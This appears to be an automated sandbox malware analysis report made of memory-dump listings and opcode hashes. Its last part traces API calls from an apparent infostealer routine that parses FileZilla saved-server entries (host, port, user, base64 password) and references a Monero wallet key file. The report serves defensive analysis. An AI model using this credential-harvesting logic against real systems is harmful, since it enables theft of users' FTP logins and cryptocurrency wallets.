                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction ID: 03f9f7305a457511786d11f10a6f263ad0d47cbd8e77e08b6ede81ac38807da4
                            • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction Fuzzy Hash: A8A13E72A00A19CBEB19CF55DCD1A9EBBB1FB58314F19C22AD41AE77A0D334A944CF50
                            Function 00114288 Relevance: .2, Instructions: 240COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction ID: 0efc909a6c9b61422e5137c48506721c759508487037a2e549eaeb220d4beccd
                            • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction Fuzzy Hash: 32A16E72E083119BD308CF25C89075BF7E2EFC8710F1ACA3DA8A997254D774E9419B82
                            Function 004C030D Relevance: .2, Instructions: 191COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1102668e0652e0588709df2b0542052c1db9c5bfcd6a122b421bc4ef88c0298d
                            • Instruction ID: b564c8ace1505d3fc693ea26b5fe07b4076c1135e52c4ac5cff0512d8c4aff05
                            • Opcode Fuzzy Hash: 1102668e0652e0588709df2b0542052c1db9c5bfcd6a122b421bc4ef88c0298d
                            • Instruction Fuzzy Hash: 205107F3A081005FE348AA39EC4577BB7D6DFD4724F2AC93DE699C7784E53888018696
                            Function 0049D0E6 Relevance: .2, Instructions: 161COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: afcec79e9d5274aa5e0d8a29c74b695aa55224aad63c23bcd795a6cf4c9fc842
                            • Instruction ID: 3826f0758ca52258e43becc31268c5299d04c8fdf53aa038bbf9c549a84f5f15
                            • Opcode Fuzzy Hash: afcec79e9d5274aa5e0d8a29c74b695aa55224aad63c23bcd795a6cf4c9fc842
                            • Instruction Fuzzy Hash: A04159F3D081105FF708AE19DC5577AB796EFA0720F1A863DEAC683784E975580187D2
                            Function 004CCF24 Relevance: .2, Instructions: 159COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: de0ddd8b64223e2d3b8d54c4d7ee3a0e2ce4efa94c80f8bd1864e7701e9a1d07
                            • Instruction ID: 4b5a353d9590e41b602986d9e7789447c6698c812c7436c529ba4b1ebfac26ef
                            • Opcode Fuzzy Hash: de0ddd8b64223e2d3b8d54c4d7ee3a0e2ce4efa94c80f8bd1864e7701e9a1d07
                            • Instruction Fuzzy Hash: F25149F3E443149BF304AD69DD8436ABAD6EB84720F1B853C9B8897B84E97D5C0643C6
                            Function 003E71E2 Relevance: .1, Instructions: 146COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36e3ccb126c9f53f9617a0a01f8f00494627957431dabd5f6326ea1d25f846e5
                            • Instruction ID: 08e4e9be46a67beaafd322feaedee866b7f86ef51a680e72414883bace904a39
                            • Opcode Fuzzy Hash: 36e3ccb126c9f53f9617a0a01f8f00494627957431dabd5f6326ea1d25f846e5
                            • Instruction Fuzzy Hash: B54130F36086149BD708AE3CED9437ABBE9EF95610F19C63DE6C5C7788F57548004682
                            Function 00146799 Relevance: .1, Instructions: 131COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction ID: edb267751f3413c3af2de4508fc1e7f93153ab01c6547ee65cc42f4e5a01af11
                            • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction Fuzzy Hash: 55514D62E09BD989C7058B7544502EEBFB21FE6214F1E829EC4981F383C3759689D3E6
                            Function 004EB178 Relevance: .1, Instructions: 128COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b959c53ff15f18484ebf8e39a4bce5004b1988751b375adcdb465c22598b4b8
                            • Instruction ID: 7bb8eb4b2c9b2fa14f53f13f5c1cdf1ea98bdac7225e233a303db606ffe7b425
                            • Opcode Fuzzy Hash: 5b959c53ff15f18484ebf8e39a4bce5004b1988751b375adcdb465c22598b4b8
                            • Instruction Fuzzy Hash: 2F415BF360C3089BD3146E79EC8663AF7EADFD0220F5B492ED1C087704E9765805C656
                            Function 005D15B4 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 089188d350a5f513e5a2aecb0434be2e2d2f4ee094c99468beddfd542cb4bd2b
                            • Instruction ID: d3a61f63cc2f8b323ae750db4d9ad246afc34e2f46720804c1b303562a618b14
                            • Opcode Fuzzy Hash: 089188d350a5f513e5a2aecb0434be2e2d2f4ee094c99468beddfd542cb4bd2b
                            • Instruction Fuzzy Hash: CA21E3F250C604AFE719AF68D892A6AFBE4FF58310F06092DE6D6C7350E6319480DB47
                            Function 00117588 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                            • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                            • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                            • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                            Function 000E9AA0 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 000E03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • GetProcessHeap.KERNEL32(00000000,000F423F,000F0DBF,000F0DBE,000F0DBB,000F0DBA), ref: 000E04C2
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E04C9
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 000E04E5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E04F3
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 000E052F
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E053D
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 000E0579
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E0587
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000E05C3
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E05D5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E0662
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E067A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E0692
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E06AA
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 000E06C2
                            • lstrcat.KERNEL32(?,profile: null), ref: 000E06D1
                            • lstrcat.KERNEL32(?,url: ), ref: 000E06E0
                            • lstrcat.KERNEL32(?,00000000), ref: 000E06F3
                            • lstrcat.KERNEL32(?,000F1770), ref: 000E0702
                            • lstrcat.KERNEL32(?,00000000), ref: 000E0715
                            • lstrcat.KERNEL32(?,000F1774), ref: 000E0724
                            • lstrcat.KERNEL32(?,login: ), ref: 000E0733
